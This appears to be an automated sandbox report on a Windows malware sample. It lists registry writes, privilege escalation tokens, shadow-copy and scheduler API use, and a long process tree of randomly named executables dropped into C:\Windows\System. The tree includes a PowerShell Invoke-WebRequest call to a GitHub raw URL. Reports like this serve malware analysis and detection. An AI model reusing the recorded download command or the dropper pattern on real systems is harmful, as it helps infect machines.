| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoftwindows.client.cbs\ = "0" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "3095" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1696768468-2170909707-4198977321-1000\{5BF1EC3C-BE4D-40E6-A7B2-F6CC9537EAC7} | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "13217" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13184" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "13184" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2986" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "13184" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\NumberOfSubdomains = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\Total = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13217" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133586183531326085" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c2006020004002c0010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "23" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe
"C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
C:\Windows\System\axVNZQz.exe
C:\Windows\System\axVNZQz.exe
C:\Windows\System\aPjGTGe.exe
C:\Windows\System\aPjGTGe.exe
C:\Windows\System\EWdOxVy.exe
C:\Windows\System\EWdOxVy.exe
C:\Windows\System\brHqTLB.exe
C:\Windows\System\brHqTLB.exe
C:\Windows\System\IBMKRWO.exe
C:\Windows\System\IBMKRWO.exe
C:\Windows\System\sOalaow.exe
C:\Windows\System\sOalaow.exe
C:\Windows\System\qndCowM.exe
C:\Windows\System\qndCowM.exe
C:\Windows\System\PpisgNH.exe
C:\Windows\System\PpisgNH.exe
C:\Windows\System\urUyRME.exe
C:\Windows\System\urUyRME.exe
C:\Windows\System\nwWVnrF.exe
C:\Windows\System\nwWVnrF.exe
C:\Windows\System\OwTpFMC.exe
C:\Windows\System\OwTpFMC.exe
C:\Windows\System\SwCQmTw.exe
C:\Windows\System\SwCQmTw.exe
C:\Windows\System\bLpZMhH.exe
C:\Windows\System\bLpZMhH.exe
C:\Windows\System\pyyHgjv.exe
C:\Windows\System\pyyHgjv.exe
C:\Windows\System\Burqpzn.exe
C:\Windows\System\Burqpzn.exe
C:\Windows\System\XDZxNQE.exe
C:\Windows\System\XDZxNQE.exe
C:\Windows\System\OuNGpZq.exe
C:\Windows\System\OuNGpZq.exe
C:\Windows\System\ILGXdDw.exe
C:\Windows\System\ILGXdDw.exe
C:\Windows\System\TAOyIgC.exe
C:\Windows\System\TAOyIgC.exe
C:\Windows\System\RdtjIlK.exe
C:\Windows\System\RdtjIlK.exe
C:\Windows\System\qUtHKyC.exe
C:\Windows\System\qUtHKyC.exe
C:\Windows\System\ygtUIca.exe
C:\Windows\System\ygtUIca.exe
C:\Windows\System\JJjLlUH.exe
C:\Windows\System\JJjLlUH.exe
C:\Windows\System\ScQKdch.exe
C:\Windows\System\ScQKdch.exe
C:\Windows\System\trEJEmh.exe
C:\Windows\System\trEJEmh.exe
C:\Windows\System\nKADzeH.exe
C:\Windows\System\nKADzeH.exe
C:\Windows\System\ybHZLWM.exe
C:\Windows\System\ybHZLWM.exe
C:\Windows\System\AmtaodT.exe
C:\Windows\System\AmtaodT.exe
C:\Windows\System\RLvenfC.exe
C:\Windows\System\RLvenfC.exe
C:\Windows\System\whoZHnc.exe
C:\Windows\System\whoZHnc.exe
C:\Windows\System\zoOJLVN.exe
C:\Windows\System\zoOJLVN.exe
C:\Windows\System\SyqIKiE.exe
C:\Windows\System\SyqIKiE.exe
C:\Windows\System\JwmkKWr.exe
C:\Windows\System\JwmkKWr.exe
C:\Windows\System\uomMsCL.exe
C:\Windows\System\uomMsCL.exe
C:\Windows\System\qfsgPNK.exe
C:\Windows\System\qfsgPNK.exe
C:\Windows\System\ZLHJgrb.exe
C:\Windows\System\ZLHJgrb.exe
C:\Windows\System\UpmNNNc.exe
C:\Windows\System\UpmNNNc.exe
C:\Windows\System\jSHSNNo.exe
C:\Windows\System\jSHSNNo.exe
C:\Windows\System\KjzBcML.exe
C:\Windows\System\KjzBcML.exe
C:\Windows\System\bxLGsnI.exe
C:\Windows\System\bxLGsnI.exe
C:\Windows\System\HghtKZy.exe
C:\Windows\System\HghtKZy.exe
C:\Windows\System\HlheYaz.exe
C:\Windows\System\HlheYaz.exe
C:\Windows\System\DtakIIV.exe
C:\Windows\System\DtakIIV.exe
C:\Windows\System\KSLmDSj.exe
C:\Windows\System\KSLmDSj.exe
C:\Windows\System\UVEbZRA.exe
C:\Windows\System\UVEbZRA.exe
C:\Windows\System\EYBfZjX.exe
C:\Windows\System\EYBfZjX.exe
C:\Windows\System\eRDrLDn.exe
C:\Windows\System\eRDrLDn.exe
C:\Windows\System\Eokyjbl.exe
C:\Windows\System\Eokyjbl.exe
C:\Windows\System\mgRmMZb.exe
C:\Windows\System\mgRmMZb.exe
C:\Windows\System\nOqNTFJ.exe
C:\Windows\System\nOqNTFJ.exe
C:\Windows\System\glLEVTL.exe
C:\Windows\System\glLEVTL.exe
C:\Windows\System\CplFYAK.exe
C:\Windows\System\CplFYAK.exe
C:\Windows\System\uZyViSu.exe
C:\Windows\System\uZyViSu.exe
C:\Windows\System\zbFLVEz.exe
C:\Windows\System\zbFLVEz.exe
C:\Windows\System\uoPtpCa.exe
C:\Windows\System\uoPtpCa.exe
C:\Windows\System\seXQAAj.exe
C:\Windows\System\seXQAAj.exe
C:\Windows\System\IlhRTZJ.exe
C:\Windows\System\IlhRTZJ.exe
C:\Windows\System\mnIGCht.exe
C:\Windows\System\mnIGCht.exe
C:\Windows\System\PFwZwRy.exe
C:\Windows\System\PFwZwRy.exe
C:\Windows\System\buusUZo.exe
C:\Windows\System\buusUZo.exe
C:\Windows\System\ErfkTej.exe
C:\Windows\System\ErfkTej.exe
C:\Windows\System\TRdfIRQ.exe
C:\Windows\System\TRdfIRQ.exe
C:\Windows\System\BKhgDAT.exe
C:\Windows\System\BKhgDAT.exe
C:\Windows\System\zgMDbxO.exe
C:\Windows\System\zgMDbxO.exe
C:\Windows\System\ommsLKu.exe
C:\Windows\System\ommsLKu.exe
C:\Windows\System\AuNLKLZ.exe
C:\Windows\System\AuNLKLZ.exe
C:\Windows\System\gtSReBv.exe
C:\Windows\System\gtSReBv.exe
C:\Windows\System\EyySyoh.exe
C:\Windows\System\EyySyoh.exe
C:\Windows\System\gUWvuLK.exe
C:\Windows\System\gUWvuLK.exe
C:\Windows\System\eajXYrT.exe
C:\Windows\System\eajXYrT.exe
C:\Windows\System\TFborHa.exe
C:\Windows\System\TFborHa.exe
C:\Windows\System\uMCyArA.exe
C:\Windows\System\uMCyArA.exe
C:\Windows\System\aQfBRpG.exe
C:\Windows\System\aQfBRpG.exe
C:\Windows\System\NXIkbaK.exe
C:\Windows\System\NXIkbaK.exe
C:\Windows\System\RSVFSKj.exe
C:\Windows\System\RSVFSKj.exe
C:\Windows\System\SbzIlWd.exe
C:\Windows\System\SbzIlWd.exe
C:\Windows\System\ecSyMaF.exe
C:\Windows\System\ecSyMaF.exe
C:\Windows\System\UtMtgIZ.exe
C:\Windows\System\UtMtgIZ.exe
C:\Windows\System\xhIyEbV.exe
C:\Windows\System\xhIyEbV.exe
C:\Windows\System\rSVfnmb.exe
C:\Windows\System\rSVfnmb.exe
C:\Windows\System\RbzuliS.exe
C:\Windows\System\RbzuliS.exe
C:\Windows\System\wFdxZtN.exe
C:\Windows\System\wFdxZtN.exe
C:\Windows\System\MMGUVvb.exe
C:\Windows\System\MMGUVvb.exe
C:\Windows\System\xyOygCh.exe
C:\Windows\System\xyOygCh.exe
C:\Windows\System\kcrLFqD.exe
C:\Windows\System\kcrLFqD.exe
C:\Windows\System\iMzlkeC.exe
C:\Windows\System\iMzlkeC.exe
C:\Windows\System\ArvkLiO.exe
C:\Windows\System\ArvkLiO.exe
C:\Windows\System\ytOVIbZ.exe
C:\Windows\System\ytOVIbZ.exe
C:\Windows\System\ThEEWXB.exe
C:\Windows\System\ThEEWXB.exe
C:\Windows\System\lAXkGjG.exe
C:\Windows\System\lAXkGjG.exe
C:\Windows\System\hkKXvOL.exe
